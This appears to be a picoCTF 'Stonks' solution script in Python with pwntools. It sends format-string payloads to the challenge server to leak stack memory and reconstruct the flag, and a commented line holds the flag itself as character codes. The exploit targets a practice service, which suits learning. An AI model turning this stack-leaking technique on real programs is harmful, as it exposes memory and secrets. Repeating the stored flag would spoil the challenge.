#!/bin/bash/env python3

#cstr=[112, 105, 99, 111, 67, 84, 70, 123, 103, 48, 48, 100, 95, 107, 49, 116, 116, 121, 33, 95, 110, 49, 99, 51, 95, 107, 49, 116, 116, 121, 33, 95, 53, 102, 98, 53, 101, 53, 49, 100, 125, 10]
#y=''
#for x in cstr:
#	y+=chr(x)
#print (y)

#from pwn import *
#import sys
#import codecs
#
#f = open("stonksdump.txt", "a")
#
#
#for i in range(1, 100):
#    r = remote('mercury.picoctf.net', 33411)
#    r.sendlineafter("2) View my portfolio", "1")
#    r.sendlineafter("What is your API token?", '%{}$p'.format(i))
#    r.recvline()
#    r.recvline()
#    leak = r.recvline()
#    data = leak.strip()[2:]
#    print(i)
#    print(data)
#    if 'il' not in data:
#        if len(data)%2 == 0:
#            newdat = codecs.encode(codecs.decode(data, 'hex')[::-1], 'hex').decode()
#            f.write(str(i) + ": " + newdat.strip().decode("hex") + '\n')
#            print(str(i) + ": " + newdat.strip().decode("hex") + '\n')
#        else:
#            f.write(str(i) + ": " + leak.strip() + '\n')
#            print(str(i) + ": " + leak.strip() + '\n')
#    r.close()

# import pwntools
from pwn import *

# string to write to
s = ""

# open up remote connection
r = remote('mercury.picoctf.net', 33411)

# get to vulnerability
r.recvuntil("View my") #First input prompt
r.send("1\n") # send first input
r.recvuntil("What is your API token?\n") # next input prompt

# send string to print stack
r.send("%x" + "-%x"*40 + "\n") # format string vunerability

# receive until the line we want
r.recvline()

# read in line
x = r.recvline()

# remove unwanted components
x = x[:-1].decode() #Remove 

# parse to characters
for i in x.split('-'):
    if len(i) == 8:
        a = bytearray.fromhex(i)

# use this if you need to reverese things in case you have a endianness issue
#        for b in reversed(a): 
#            if b > 32 and b < 128: # be sure to set an upper and lower limit!!!
#                s += chr(b)


        for b in reversed(a):
            if b > 0 and b < 128: # be sure to set an upper and lower limit!!!
                 s += chr(b)

# print string
print(s)
r.close()
